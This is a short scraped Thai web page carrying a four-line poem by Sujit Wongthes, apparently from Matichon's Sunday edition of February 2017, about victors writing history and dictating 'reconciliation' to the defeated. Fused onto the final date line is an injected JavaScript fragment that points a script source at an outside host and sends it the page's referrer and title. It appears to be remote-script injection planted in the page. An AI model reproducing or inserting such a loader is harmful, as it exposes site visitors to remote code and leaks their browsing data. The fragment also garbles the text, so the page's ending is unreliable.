มติชน วันอาทิตย์

12 กุมภาพันธ์ 2560

 

ผู้ชนะเขียนประวัติศาสตร์

ความร้ายกาจกองอยู่ผู้แพ้พ่าย

ปรองดองของผู้ชนะย่อมเป็นนาย

ผู้แพ้ต้องน้อมกายไม่มีใจ

 

สุจิตต์ วงษ์เทศ

ศุกร์ 10 กุมภาพันธ์ 2560s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;